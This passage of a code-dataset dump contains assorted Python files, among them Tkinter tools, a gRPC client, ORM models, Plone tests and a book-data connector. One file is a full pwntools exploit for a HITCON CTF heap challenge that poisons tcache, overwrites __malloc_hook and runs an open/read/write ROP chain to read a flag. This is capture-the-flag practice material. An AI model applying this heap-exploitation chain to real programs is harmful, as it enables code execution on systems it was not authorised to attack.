principal\nmain()","sub_path":"juego/Juegoberny.py","file_name":"Juegoberny.py","file_ext":"py","file_size_in_byte":8813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"102115801","text":"def validate_emails(email, col, index):\n try:\n valid = validate_email(email)\n email = valid.email\n except EmailNotValidError as e:\n logging.error(f\"Index: {index}, Column: {col}, Not a valid email address.\")\n\n\n\n\ndef validate_email(email, col, index):\n is_valid_email = bool(re.search(r\"^[\\w\\.\\+\\-]+\\@[\\w]+\\.[a-z]{2,3}$\", email))\n\n if not is_valid_email:\n logging.error(f\"Index: {index}, Column: {col}, Not a valid email address.\")\n\n\nsubset_cols = [\"Agent Last Name\", \"Agent Middle Name\", \"Agent First Name\",\n \"Agent Writing Contract Start Date\", \"Date when an agent became A2O\"]\n","sub_path":"week_2/weekend/archive/archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"82407409","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#读取execel使用(支持07)\nfrom openpyxl import Workbook\n#写入excel使用(支持07)\nfrom openpyxl import load_workbook\nimport tkinter.filedialog as filedialog\nfrom tkinter import *\nimport os\n\ndef readexcel(path):\n wb=load_workbook(path)\n #print(wb)\n #print(wb.get_sheet_names())\n ws = wb['工作表1']\n l = []\n \n for n in ws.values:\n l.append(list(n))\n \n return l\n\ndef callback(entry):\n entry.delete(0,END) #清空entry里面的内容\n #listbox_filename.delete(0,END)\n #调用filedialog模块的askdirectory()函数去打开文件夹\n filepath = filedialog.askopenfilename()\n if filepath:\n entry.insert(0,filepath) #将选择好的路径加入到entry里面\n print (filepath)\n return filepath\n#getdir(filepath)\n\ndef getdir(filepath=os.getcwd()):\n \"\"\"\n 用于获取目录下的文件列表\n \"\"\"\n cf = os.listdir(filepath)\n for i in cf:\n listbox_filename.insert(END,i)\n\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"测试版本\")\n root.geometry(\"600x400\")\n root.rowconfigure(1, weight=1)\n root.rowconfigure(2, weight=1)\n \n entry1 = Entry(root, width=60)\n entry1.grid(sticky=W+N, row=0, column=0, columnspan=4, padx=5, pady=5)\n \n button1 = Button(root,text=\"选择文件\",command = lambda: callback(entry1))\n button1.grid(sticky=W+N, row=1, column=0, padx=5, pady=5)\n \n entry2 = Entry(root, width=60)\n entry2.grid(sticky=W+N, row=2, column=0, columnspan=4, padx=5, pady=5)\n \n button2 = Button(root,text=\"选择文件\",command = lambda: callback(entry2))\n button2.grid(sticky=W+N, row=3, column=0, padx=5, pady=5)\n #创建loistbox用来显示所有文件名\n \n root.mainloop()\n \n '''\n readpath = \"./data2/octane.xlsx\"\n a = readexcel(readpath)\n print(a)\n '''\n","sub_path":"bplib_2/exl.py","file_name":"exl.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643669985","text":"import grpc\n\nimport secretsharing_pb2 as s_shr_pb\nimport secretsharing_pb2_grpc as s_shr_grpc\n\nimport jwt\nfrom jwt.algorithms import RSAAlgorithm\n\nfrom cryptography import x509\nfrom cryptography.hazmat.backends import default_backend\n\nimport requests\nimport json\n\ndef reformat_pem_key(key):\n formated = \"-----BEGIN CERTIFICATE-----\\n%s\\n-----END CERTIFICATE-----\\n\" % key\n print(formated)\n return formated\n \ndef check_jwt_signature(jwt_token):\n url = 'https://aas.us.attest.azure.net/certs'\n response = requests.get(url).json()\n keys = response['keys']\n certs = dict()\n for jwk in keys:\n kid = jwk['kid']\n certs[kid] = jwk['x5c']\n kid = jwt.get_unverified_header(jwt_token)['kid']\n\n pem_data = reformat_pem_key(certs[kid][0])\n key_ascii = pem_data.encode('ascii')\n cert = x509.load_pem_x509_certificate(key_ascii, default_backend())\n public_key = cert.public_key()\n\n payload = jwt.decode(jwt_token, key=public_key, algorithms=['RS256'])\n print(json.dumps(payload, indent=2))\n\ndef run():\n with grpc.insecure_channel(target='localhost:5000',\n options=[('grpc.enable_retries', 0),\n ('grpc.keepalive_timeout_ms', 100)\n ]) as channel:\n stub = s_shr_grpc.SecretSharingStub(channel)\n response = stub.GetAttestation(\n s_shr_pb.AttestationRequest(cmd=s_shr_pb.CommandRequest.ATTESTATION))\n if response.ok:\n print(\"Get Attestation response: %s\" % response.msg)\n check_jwt_signature(response.token)\n else:\n print(\"Get Attestation failed with message: %s\" % response.msg)\n\nif __name__ == '__main__':\n run()\n","sub_path":"one_enclave/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"364608848","text":"#!/usr/bin/python\n\"\"\"TransactionKeyValue links Transactions and Keys and Values objects.\"\"\"\nfrom peewee import ForeignKeyField, CompositeKey, Expression, OP, unicode_type\nfrom metadata.orm.base import DB\nfrom metadata.orm.utils import index_hash\nfrom metadata.orm.proposals import Proposals\nfrom metadata.orm.analytical_tools import AnalyticalTools\nfrom metadata.rest.orm import CherryPyAPI\n\n\nclass AToolProposal(CherryPyAPI):\n \"\"\"\n TransactionKeyValue attributes are foreign keys.\n\n Attributes:\n +-------------------+-------------------------------------+\n | Name | Description |\n +===================+=====================================+\n | proposal | Link to the Proposals model |\n +-------------------+-------------------------------------+\n | analytical_tool | Link to the AnalyticalTools model |\n +-------------------+-------------------------------------+\n \"\"\"\n\n proposal = ForeignKeyField(Proposals, related_name='atools')\n analytical_tool = ForeignKeyField(AnalyticalTools, related_name='proposals')\n\n # pylint: disable=too-few-public-methods\n class Meta(object):\n \"\"\"PeeWee meta class contains the database and the primary key.\"\"\"\n\n database = DB\n primary_key = CompositeKey('analytical_tool', 'proposal')\n # pylint: enable=too-few-public-methods\n\n @staticmethod\n def elastic_mapping_builder(obj):\n \"\"\"Build the elasticsearch mapping bits.\"\"\"\n super(AToolProposal, AToolProposal).elastic_mapping_builder(obj)\n obj['proposal_id'] = {'type': 'text', 'fields': {'keyword': {'type': 'keyword', 'ignore_above': 256}}}\n obj['analytical_tool_id'] = {'type': 'integer'}\n\n def to_hash(self, recursion_depth=1):\n \"\"\"Convert the object to a hash.\"\"\"\n obj = super(AToolProposal, self).to_hash(recursion_depth)\n obj['_id'] = index_hash(unicode_type(self.proposal.id),\n int(self.analytical_tool.id))\n obj['proposal_id'] = unicode_type(self.proposal.id)\n obj['analytical_tool_id'] = int(self.analytical_tool.id)\n return obj\n\n def from_hash(self, obj):\n \"\"\"Convert the hash into the object.\"\"\"\n super(AToolProposal, self).from_hash(obj)\n if 'proposal_id' in obj:\n self.proposal = Proposals.get(Proposals.id == obj['proposal_id'])\n if 'analytical_tool_id' in obj:\n self.analytical_tool = AnalyticalTools.get(\n AnalyticalTools.id == obj['analytical_tool_id']\n )\n\n def where_clause(self, kwargs):\n \"\"\"Where clause for the various elements.\"\"\"\n where_clause = super(AToolProposal, self).where_clause(kwargs)\n if 'proposal_id' in kwargs:\n prop = Proposals.get(Proposals.id == kwargs['proposal_id'])\n where_clause &= Expression(AToolProposal.proposal, OP.EQ, prop)\n if 'analytical_tool_id' in kwargs:\n atool = AnalyticalTools.get(AnalyticalTools.id == kwargs['analytical_tool_id'])\n where_clause &= Expression(AToolProposal.analytical_tool, OP.EQ, atool)\n return where_clause\n","sub_path":"metadata/orm/atool_proposal.py","file_name":"atool_proposal.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564512792","text":"from ftw.testbrowser import browsing\nfrom ftw.testbrowser.pages import statusmessages\nfrom opengever.ogds.base.utils import get_current_org_unit\nfrom opengever.task.browser.delegate.vocabulary import attachable_documents_vocabulary\nfrom opengever.testing import IntegrationTestCase\nfrom plone import api\nfrom zope.app.intid.interfaces import IIntIds\nfrom zope.component import getUtility\n\n\nclass TestDelegateTaskToInbox(IntegrationTestCase):\n\n @browsing\n def test_delegate_to_inbox(self, browser):\n self.login(self.secretariat_user, browser)\n\n browser.open(self.task,\n view='@@task_transition_controller',\n data={'transition': 'task-transition-delegate'})\n\n form = browser.find_form_by_field('Responsibles')\n form.find_widget('Responsibles').fill(\n ['inbox:{}'.format(get_current_org_unit().id())])\n browser.css('#form-buttons-save').first.click() # can't use submit()\n\n form = browser.find_form_by_field('Issuer')\n form.find_widget('Issuer').fill(self.dossier_responsible.getId())\n\n browser.css('#form-buttons-save').first.click() # can't use submit()\n\n self.assertEqual(['1 subtasks were created.'],\n statusmessages.info_messages())\n\n\nclass TestDelegateTaskForm(IntegrationTestCase):\n\n @browsing\n def test_delegate_creates_subtask(self, browser):\n self.login(self.regular_user, browser=browser)\n\n browser.open(self.task, view='delegate_recipients')\n\n # step 1\n form = browser.find_form_by_field('Responsibles')\n form.find_widget('Responsibles').fill(self.dossier_responsible)\n browser.css('#form-buttons-save').first.click()\n\n # step 2\n browser.css('#form-buttons-save').first.click()\n\n self.assertEqual(['1 subtasks were created.'],\n statusmessages.info_messages())\n\n subtask = self.task.objectValues()[-1]\n self.assertEqual(self.task.title, subtask.title)\n self.assertEqual('robert.ziegler', subtask.responsible)\n self.assertEqual('fa', subtask.responsible_client)\n self.assertEqual('task-state-open', api.content.get_state(subtask))\n self.assertEqual('task-15', subtask.id)\n\n @browsing\n def test_delegate_does_not_set_documents_attribute_on_subtask(self, browser):\n self.login(self.regular_user, browser=browser)\n\n browser.open(self.task, view='delegate_recipients')\n\n # step 1\n form = browser.find_form_by_field('Responsibles')\n form.find_widget('Responsibles').fill(self.dossier_responsible)\n browser.css('#form-buttons-save').first.click()\n\n # step 2\n browser.css('#form-buttons-save').first.click()\n\n subtask = self.task.objectValues()[-1]\n self.assertFalse(\n hasattr(subtask, 'documents'),\n 'The transition-extender should not pass the documents-property to the dexterity createContent method.'\n )\n\n @browsing\n def test_issuer_is_prefilled_with_current_user(self, browser):\n self.login(self.regular_user, browser=browser)\n\n browser.open(self.task, view='delegate_recipients')\n\n form = browser.find_form_by_field('Responsibles')\n form.find_widget('Responsibles').fill(self.dossier_responsible)\n browser.css('#form-buttons-save').first.click()\n\n self.assertEqual(\n self.regular_user.getId(), browser.find('Issuer').value)\n\n @browsing\n def test_responsible_is_required(self, browser):\n self.login(self.regular_user, browser=browser)\n\n browser.open(self.task, view='delegate_recipients')\n browser.css('#form-buttons-save').first.click()\n\n self.assertEqual(\n ['Required input is missing.'],\n browser.css('#formfield-form-widgets-responsibles .error').text)\n\n @browsing\n def test_teams_are_selectable_as_responsible(self, browser):\n self.login(self.regular_user, browser=browser)\n\n browser.open(self.task, view='delegate_recipients')\n\n form = browser.find_form_by_field('Responsibles')\n form.find_widget('Responsibles').fill(['team:1'])\n browser.css('#form-buttons-save').first.click() # can't use submit()\n\n form = browser.find_form_by_field('Issuer')\n form.find_widget('Issuer').fill(self.dossier_responsible.getId())\n browser.css('#form-buttons-save').first.click() # can't use submit()\n\n self.assertEqual(\n ['1 subtasks were created.'], statusmessages.info_messages())\n\n\nclass TestAttachableDocumentsVocabulary(IntegrationTestCase):\n\n def test_attachable_documents_vocabulary_lists_contained_and_related_documents(self):\n self.login(self.regular_user)\n intids = getUtility(IIntIds)\n terms = attachable_documents_vocabulary(self.task)\n\n self.assertItemsEqual(\n [el.UID() for el in [self.document, self.taskdocument]],\n [term.token for term in terms])\n self.assertItemsEqual(\n [str(intids.getId(el)) for el in [self.document, self.taskdocument]],\n [term.value for term in terms])\n","sub_path":"opengever/task/tests/test_delegate.py","file_name":"test_delegate.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"194158180","text":"import time\nimport httplib2\nimport json\n\n# Conifguration Record,\n# Device Id (Assigned manually)\n# Device Type (S = Switch, T = Temp sensor)\n# Device Number (Assigned by Server)\n# Device Instance\n# Device Name\n\niSleepTime = 10\n\n#sFileName = \"/mnt/nas/temp.inf\"\n#sStopFileName = \"/mnt/nas/stop.yes\"\n#sDeviceConfigFileName = \"config.txt\"\n\n#sFileName = \"temp.inf\"\n#sDeviceConfigFileName = \"config.txt\"\n#sStopFileName = \"stop.yes\"\nsServerAddress = \"192.168.0.79:8083\"\n\nh = httplib2.Http()\n\n\ndef compile_httprefresh(iDeviceNum, iDeviceInstance):\n sOutBuf = \"http://\" + sServerAddress + \"/ZWaveAPI/Run/devices[\" + str(iDeviceNum)\n sOutBuf = sOutBuf + \"].instances[\" + str(iDeviceInstance) + \"].commandClasses[0x25].Get()\"\n return sOutBuf\n\ndef compile_httpgettemp(IDeviceNum, ICmdClass):\n sOutBuf = \"http://192.168.0.79:8083/ZWaveAPI/Run/devices[\" + str(IDeviceNum)\n sOutBuf = sOutBuf + \"].instances[0].commandClasses[\" + str(ICmdClass)\n sOutBuf = sOutBuf + \"].data.level.value\"\n# sOutBuf = sOutBuf +\"].Get()\"\n# sOutBuf = sOutBuf + \"].data[1]\"\n return sOutBuf\n\ndef get_currenttemp(iDeviceNum, iDeviceInstance):\n print(\"Run Refresh --->\")\n# resp, content = h.request(compile_httprefresh(iDeviceNum, iDeviceInstance), \"GET\")\n# print(resp,\"\\n\")\n# print(content,\"\\n\")\n# print(\"Run Get --->\")\n resp, content = h.request(compile_httpgettemp(iDeviceNum, 49), \"GET\")\n# print(resp,\"\\n\")\n print(content,\"\\n\")\n# try:\n# DDevInfo = json.loads(content.decode('ascii'))\n# return DDevInfo\n# except (ValueError):\n# return \"\"\n return \"\"\n \ndef get_currenttime(DDevInfo):\n return DDevInfo[\"updateTime\"]\n\ndef get_openfile(SFileName):\n try:\n tobj = open(SFileName, \"r\")\n tobj.close()\n return True\n except (IOError, TypeError):\n return False\n\nStopRun = False\n\nprint(\"Application started !\\n\")\n\nwhile StopRun == False:\n\n# fConfFile = open(sDeviceConfigFileName, \"r\")\n# fObiS = open(sFileName, \"a\")\n\n# for sLine in fConfFile:\n\n# rConfigRecord = sLine.split(\",\")\n \n# iDeviceId = int(rConfigRecord[0])\n# sDeviceType = rConfigRecord[1].strip()\n# iDeviceNum = int(rConfigRecord[2])\n# iDeviceInst = int(rConfigRecord[3])\n# sDeviceName = rConfigRecord[4].strip()\n\n# if sDeviceType == \"T\":\n sDevResp = get_currenttemp(12, 0)\n print(\"sDevResp :\", sDevResp)\n# if sDevResp != \"\":\n# sDevTemp = sDevResp\n# sRequestTime = time.ctime(time.time())\n# print(\"Device :\", str(iDeviceNum), \":\", sDeviceName, \"- Time :\", sRequestTime, \"- Temparatur : \", sDevTemp)\n# fObiS.write(\"{}, {}, {}\\n\".format(str(iDeviceNum), sRequestTime, sDevTemp))\n# else:\n# print(\"Value Error thrown - \", time.ctime(time.time()))\n# fObiS.write(\"{} {}\\n\".format(\"Value erroro at :\", time.ctime(time.time())))\n\n# fObiS.close()\n# fConfFile.close()\n\n time.sleep(iSleepTime)\n# StopRun = get_openfile(sStopFileName) \n\nprint(\"\\nApplication halted !\\n\")\n","sub_path":"homeautomation/python/Archive/read_analog_v0.1.py","file_name":"read_analog_v0.1.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"623995207","text":"''' functionality outline for a book data connector '''\nfrom abc import ABC, abstractmethod\nfrom dataclasses import dataclass\nimport pytz\nfrom urllib3.exceptions import RequestError\n\nfrom django.db import transaction\nfrom dateutil import parser\nimport requests\nfrom requests import HTTPError\nfrom requests.exceptions import SSLError\n\nfrom bookwyrm import models\n\n\nclass ConnectorException(HTTPError):\n ''' when the connector can't do what was asked '''\n\n\nclass AbstractMinimalConnector(ABC):\n ''' just the bare bones, for other bookwyrm instances '''\n def __init__(self, identifier):\n # load connector settings\n info = models.Connector.objects.get(identifier=identifier)\n self.connector = info\n\n # the things in the connector model to copy over\n self_fields = [\n 'base_url',\n 'books_url',\n 'covers_url',\n 'search_url',\n 'max_query_count',\n 'name',\n 'identifier',\n 'local'\n ]\n for field in self_fields:\n setattr(self, field, getattr(info, field))\n\n def search(self, query, min_confidence=None):\n ''' free text search '''\n resp = requests.get(\n '%s%s' % (self.search_url, query),\n headers={\n 'Accept': 'application/json; charset=utf-8',\n },\n )\n if not resp.ok:\n resp.raise_for_status()\n data = resp.json()\n results = []\n\n for doc in self.parse_search_data(data)[:10]:\n results.append(self.format_search_result(doc))\n return results\n\n @abstractmethod\n def get_or_create_book(self, remote_id):\n ''' pull up a book record by whatever means possible '''\n\n @abstractmethod\n def parse_search_data(self, data):\n ''' turn the result json from a search into a list '''\n\n @abstractmethod\n def format_search_result(self, search_result):\n ''' create a SearchResult obj from json '''\n\n\nclass AbstractConnector(AbstractMinimalConnector):\n ''' generic book data connector '''\n def __init__(self, identifier):\n super().__init__(identifier)\n\n self.key_mappings = []\n\n # fields we want to look for in book data to copy over\n # title we handle separately.\n self.book_mappings = []\n\n\n def is_available(self):\n ''' check if you're allowed to use this connector '''\n if self.max_query_count is not None:\n if self.connector.query_count >= self.max_query_count:\n return False\n return True\n\n\n def get_or_create_book(self, remote_id):\n # try to load the book\n book = models.Book.objects.select_subclasses().filter(\n origin_id=remote_id\n ).first()\n if book:\n if isinstance(book, models.Work):\n return book.default_edition\n return book\n\n # no book was found, so we start creating a new one\n data = get_data(remote_id)\n\n work = None\n edition = None\n if self.is_work_data(data):\n work_data = data\n # if we requested a work and there's already an edition, we're set\n work = self.match_from_mappings(work_data, models.Work)\n if work and work.default_edition:\n return work.default_edition\n\n # no such luck, we need more information.\n try:\n edition_data = self.get_edition_from_work_data(work_data)\n except KeyError:\n # hack: re-use the work data as the edition data\n # this is why remote ids aren't necessarily unique\n edition_data = data\n else:\n edition_data = data\n edition = self.match_from_mappings(edition_data, models.Edition)\n # no need to figure out about the work if we already know about it\n if edition and edition.parent_work:\n return edition\n\n # no such luck, we need more information.\n try:\n work_data = self.get_work_from_edition_date(edition_data)\n except KeyError:\n # remember this hack: re-use the work data as the edition data\n work_data = data\n\n if not work_data or not edition_data:\n raise ConnectorException('Unable to load book data: %s' % remote_id)\n\n # at this point, we need to figure out the work, edition, or both\n # atomic so that we don't save a work with no edition for vice versa\n with transaction.atomic():\n if not work:\n work_key = self.get_remote_id_from_data(work_data)\n work = self.create_book(work_key, work_data, models.Work)\n\n if not edition:\n ed_key = self.get_remote_id_from_data(edition_data)\n edition = self.create_book(ed_key, edition_data, models.Edition)\n edition.parent_work = work\n edition.save()\n work.default_edition = edition\n work.save()\n\n # now's our change to fill in author gaps\n if not edition.authors.exists() and work.authors.exists():\n edition.authors.set(work.authors.all())\n edition.author_text = work.author_text\n edition.save()\n\n if not edition:\n raise ConnectorException('Unable to create book: %s' % remote_id)\n\n return edition\n\n\n def create_book(self, remote_id, data, model):\n ''' create a work or edition from data '''\n book = model.objects.create(\n origin_id=remote_id,\n title=data['title'],\n connector=self.connector,\n )\n return self.update_book_from_data(book, data)\n\n\n def update_book_from_data(self, book, data, update_cover=True):\n ''' for creating a new book or syncing with data '''\n book = update_from_mappings(book, data, self.book_mappings)\n\n author_text = []\n for author in self.get_authors_from_data(data):\n book.authors.add(author)\n author_text.append(author.name)\n book.author_text = ', '.join(author_text)\n book.save()\n\n if not update_cover:\n return book\n\n cover = self.get_cover_from_data(data)\n if cover:\n book.cover.save(*cover, save=True)\n return book\n\n\n def update_book(self, book, data=None):\n ''' load new data '''\n if not book.sync and not book.sync_cover:\n return book\n\n if not data:\n key = getattr(book, self.key_name)\n data = self.load_book_data(key)\n\n if book.sync:\n book = self.update_book_from_data(\n book, data, update_cover=book.sync_cover)\n else:\n cover = self.get_cover_from_data(data)\n if cover:\n book.cover.save(*cover, save=True)\n\n return book\n\n\n def match_from_mappings(self, data, model):\n ''' try to find existing copies of this book using various keys '''\n relevent_mappings = [m for m in self.key_mappings if \\\n not m.model or model == m.model]\n for mapping in relevent_mappings:\n # check if this field is present in the data\n value = data.get(mapping.remote_field)\n if not value:\n continue\n\n # extract the value in the right format\n value = mapping.formatter(value)\n\n # search our database for a matching book\n kwargs = {mapping.local_field: value}\n match = model.objects.filter(**kwargs).first()\n if match:\n return match\n return None\n\n\n @abstractmethod\n def get_remote_id_from_data(self, data):\n ''' otherwise we won't properly set the remote_id in the db '''\n\n\n @abstractmethod\n def is_work_data(self, data):\n ''' differentiate works and editions '''\n\n\n @abstractmethod\n def get_edition_from_work_data(self, data):\n ''' every work needs at least one edition '''\n\n\n @abstractmethod\n def get_work_from_edition_date(self, data):\n ''' every edition needs a work '''\n\n\n @abstractmethod\n def get_authors_from_data(self, data):\n ''' load author data '''\n\n\n @abstractmethod\n def get_cover_from_data(self, data):\n ''' load cover '''\n\n @abstractmethod\n def expand_book_data(self, book):\n ''' get more info on a book '''\n\n\ndef update_from_mappings(obj, data, mappings):\n ''' assign data to model with mappings '''\n for mapping in mappings:\n # check if this field is present in the data\n value = data.get(mapping.remote_field)\n if not value:\n continue\n\n # extract the value in the right format\n try:\n value = mapping.formatter(value)\n except:\n continue\n\n # assign the formatted value to the model\n obj.__setattr__(mapping.local_field, value)\n return obj\n\n\ndef get_date(date_string):\n ''' helper function to try to interpret dates '''\n if not date_string:\n return None\n\n try:\n return pytz.utc.localize(parser.parse(date_string))\n except ValueError:\n pass\n\n try:\n return parser.parse(date_string)\n except ValueError:\n return None\n\n\ndef get_data(url):\n ''' wrapper for request.get '''\n try:\n resp = requests.get(\n url,\n headers={\n 'Accept': 'application/json; charset=utf-8',\n },\n )\n except RequestError:\n raise ConnectorException()\n if not resp.ok:\n resp.raise_for_status()\n try:\n data = resp.json()\n except ValueError:\n raise ConnectorException()\n\n return data\n\n\ndef get_image(url):\n ''' wrapper for requesting an image '''\n try:\n resp = requests.get(url)\n except (RequestError, SSLError):\n return None\n if not resp.ok:\n return None\n return resp\n\n\n@dataclass\nclass SearchResult:\n ''' standardized search result object '''\n title: str\n key: str\n author: str\n year: str\n confidence: int = 1\n\n def __repr__(self):\n return \"\".format(\n self.key, self.title, self.author)\n\n\nclass Mapping:\n ''' associate a local database field with a field in an external dataset '''\n def __init__(\n self, local_field, remote_field=None, formatter=None, model=None):\n noop = lambda x: x\n\n self.local_field = local_field\n self.remote_field = remote_field or local_field\n self.formatter = formatter or noop\n self.model = model\n","sub_path":"bookwyrm/connectors/abstract_connector.py","file_name":"abstract_connector.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"62994797","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# For copyright and license notices, see __openerp__.py file in module root\n# directory\n##############################################################################\n\nfrom openerp import models, api\nfrom openerp.exceptions import ValidationError\nimport re\n\n\nclass ResPartner(models.Model):\n _inherit = 'res.partner'\n\n @api.multi\n @api.constrains('responsability_id', 'document_type_id', 'street')\n def _check_responsability(self):\n for partner in self:\n # chequear Si es responsable inscripto o monotributo requiere CUIT\n # y direccion\n if partner.responsability_id.code == '1' or \\\n partner.responsability_id.code == '6': # RI o Mono\n if partner.document_type_id.name != 'CUIT':\n raise ValidationError(\n u'Para ingresar un cliente \"{}\" Se requiere CUIT'.\n format(partner.responsability_id.name))\n if not partner.street:\n raise ValidationError(\n u'Para ingresar un cliente \"{}\" se requiere direccion'.\n format(partner.responsability_id.name))\n\n if partner.responsability_id.code == '5': # consumidor final\n if partner.document_type_id.code == 'Sigd':\n # Este es el consumidor final anonimo para menos de $1000\n return True\n\n if partner.document_type_id.name != 'DNI':\n raise ValidationError(\n u'Para ingresar un cliente \"{}\" al que le vamos \\n'\n u'a facturar mas de $1000 Se requiere DNI'.\n format(partner.responsability_id.name))\n if not partner.street:\n raise ValidationError(\n u'Para ingresar un cliente \"{}\" al que le vamos \\n'\n u'a facturar mas de $1000 se requiere direccion'.\n format(partner.responsability_id.name))\n\n @api.multi\n @api.constrains('document_type_id', 'document_number')\n def _check_unique_dni(self):\n for partner in self:\n if partner.document_type_id.name == 'DNI':\n recordset = self.search(\n [('document_number', '=', partner.document_number)])\n if len(recordset) > 1:\n raise ValidationError(\n u'El DNI {} ya está ingresado'.format(\n partner.document_number))\n\n @api.multi\n @api.constrains('vat', 'document_type_id')\n def _check_unique_vat(self):\n for partner in self:\n if partner.document_type_id.name == 'CUIT':\n recordset = self.search([('vat', '=', partner.vat)])\n if len(recordset) > 1:\n raise ValidationError(\n u'El CUIT {}-{}-{} ya está ingresado'.format(\n partner.vat[2:4],\n partner.vat[4:12], partner.vat[12:13]))\n\n @api.multi\n @api.constrains('document_number')\n def _check_document_type(self):\n for partner in self:\n # verifica que el DNI sea numerico\n if partner.document_type_id.name == 'DNI':\n if partner.document_number != re.sub(\"[^0-9]\",\n \"\",\n partner.document_number):\n raise ValidationError(\n u'El DNI \"{}\" debe contener solo numeros'.\n format(partner.document_number))\n","sub_path":"partner_fiscal_constraints/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378053152","text":"from Tkinter import *\n\nwindow = Tk()\nwindow.geometry(\"200x50\")\n\nframe = Frame()\nframe.pack()\n\nframe_left = Frame(bd=3, relief=SUNKEN)\nframe_left.place(relx=0, relwidth=0.6, relheight=1)\n\nframe_right = Frame(bd=3, relief=SUNKEN)\nframe_right.place(relx=0.6, relwidth=0.4)\n\nlabel_left = Label(frame_left, text=\"I've been framed!\")\nlabel_left.pack()\n\nlabel_right = Label(frame_right, text=\"So have I!\")\nlabel_right.pack()\n\n\nwindow.mainloop()\n","sub_path":"part1/chapter16/review_exercise2.1/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433016592","text":"from pwn import *\n#r = remote('node3.buuoj.cn',25105)\nr = process('./hitcon_ctf_2019_one_punch')\nelf = ELF('./hitcon_ctf_2019_one_punch')\nlibc = ELF('./libc-2.29.so')\n\n\ndef add(index,name):\n\tr.recvuntil('> ')\n\tr.sendline('1')\n\tr.recvuntil('idx: ')\n\tr.sendline(str(index))\n\tr.recvuntil('hero name: ')\n\tr.send(name)\n\n\ndef edit(index,name):\n\tr.recvuntil('> ')\n\tr.sendline('2')\n\tr.recvuntil('idx: ')\n\tr.sendline(str(index))\n\tr.recvuntil('hero name: ')\n\tr.send(name)\n\ndef show(index):\n\tr.recvuntil('> ')\n\tr.sendline('3')\n\tr.recvuntil('idx: ')\n\tr.sendline(str(index))\n\ndef free(index):\n\tr.recvuntil('> ')\n\tr.sendline('4')\n\tr.recvuntil('idx: ')\n\tr.sendline(str(index))\n\ndef fuck(payload):\n\tr.recvuntil('> ')\n\tr.sendline('50056')\n\tr.sendline(payload)\n\nfor i in range(7):\n\tadd(0,'a'*0x200)\n\tfree(0)\nshow(0)\nr.recvuntil('hero name: ')\nleak = u64(r.recvuntil('\\n',drop=True).ljust(8,'\\x00'))\nheap_base = leak - 0xcb0\nlog.success(hex(heap_base))\nadd(0,'a'*0x200)\nadd(1,'./flag\\x00\\x00'+'a'*0x200)\nfree(0)\nshow(0)\nr.recvuntil('hero name: ')\nleak = u64(r.recvuntil('\\n',drop=True).ljust(8,'\\x00'))\nlibc_base = leak - 0x1e4ca0\nlog.success(hex(libc_base))\nadd(0,'a'*0x200)\n\nfor i in range(6):\n\tadd(0,'a'*0xf0)\n\tfree(0)\n\nfor i in range(7):\n\tadd(0,'a'*0x400)\n\tfree(0)\n\n\nadd(0,'b'*0x400)\nadd(2,'a'*0x400)\nfree(0)\nadd(2,'a'*0x300)\n\nadd(1,'c'*0x400)\nadd(2,'a'*0x400)\nfree(1)\nadd(2,'a'*0x300)\n\nadd(2,'a'*0x400)\n\nedit(1,'a'*0x300+p64(0)+p64(0x101)+p64(heap_base+0x3a60)+p64(heap_base+0x1b))\n\nadd(0,'a'*0x217)\nmalloc_hook = libc_base+libc.sym['__malloc_hook']\nfree(0)\nedit(0,p64(malloc_hook))\n\nadd(1,'x'*0xf0)\n\nlog.success(hex(malloc_hook))\n\nadd_rsp_0x48_r = libc_base + 0x8cfd6\nfuck(p64(add_rsp_0x48_r))\nfuck(p64(add_rsp_0x48_r))\n\np_rdi = libc_base + 0x26542\np_rsi = libc_base + 0x26f9e\np_rdx = libc_base + 0x12bda6\np_rax = libc_base + 0x47cf8\nsyscall = libc_base + 0xcf6c5\n\n#open\npayload = p64(p_rdi)+p64(heap_base+0x12e0)\npayload += p64(p_rsi)+p64(0)\npayload += p64(p_rdx)+p64(0)\npayload += p64(p_rax)+p64(2)\npayload += p64(syscall)\n\n#read\npayload += p64(p_rdi)+p64(3)\npayload += p64(p_rsi)+p64(heap_base+0x12e0)\npayload += p64(p_rdx)+p64(0x70)\npayload += p64(p_rax)+p64(0)\npayload += p64(syscall)\n\n#write\npayload += p64(p_rdi)+p64(1)\npayload += p64(p_rsi)+p64(heap_base+0x12e0)\npayload += p64(p_rdx)+p64(0x70)\npayload += p64(p_rax)+p64(1)\npayload += p64(syscall)\nlog.info(hex(len(payload)))\nadd(0,payload)\nr.interactive()\n","sub_path":"pwn/hitcon_ctf_2019_one_punch/fuck.py","file_name":"fuck.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"19278880","text":"# Python3 code to find sequences of one upper \n# case letter followed by lower case letters\n\n#import re \nimport string\n# Function to add more values for String\ndef fStringAdd(str, word):\n return str[:len(str)] + word + str[len(str):]\ndef fStringRead(str):\n return str[:len(str)]\n\n# Function to catch the string and put on a array.\ndef 